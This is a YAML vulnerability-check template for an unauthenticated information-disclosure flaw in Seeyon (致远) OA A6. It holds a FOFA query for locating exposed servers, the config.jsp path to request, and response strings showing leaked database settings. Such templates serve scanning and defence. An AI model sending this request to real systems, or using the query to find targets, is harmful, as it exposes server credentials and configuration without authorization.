product: 致远OA
vName: 致远OA A6 config.jsp - Information Disclosure
type: 信息泄露
vID: [ ]
level: 2
vDesc: The Seeyon OA A6 config.jsp page can be accessed without authorization, resulting in sensitive information leakage vulnerabilities, through which attackers can obtain sensitive information in the server
version: ''
note: ''
search:
  FOFA: body="yyoa" && app="致远互联-OA"
protocol: http
link: https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/致远OA/致远OA A6 config.jsp 敏感信息泄漏漏洞.md
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      path: /yyoa/ext/trafaxserver/SystemManage/config.jsp
      method: get
    verify:
      logic: and
      check:
        - body:
            value:
              - DatabaseName=
              - 请在文本框内配置传真插件所需服务器的信息
            logic: and
        - status: 200
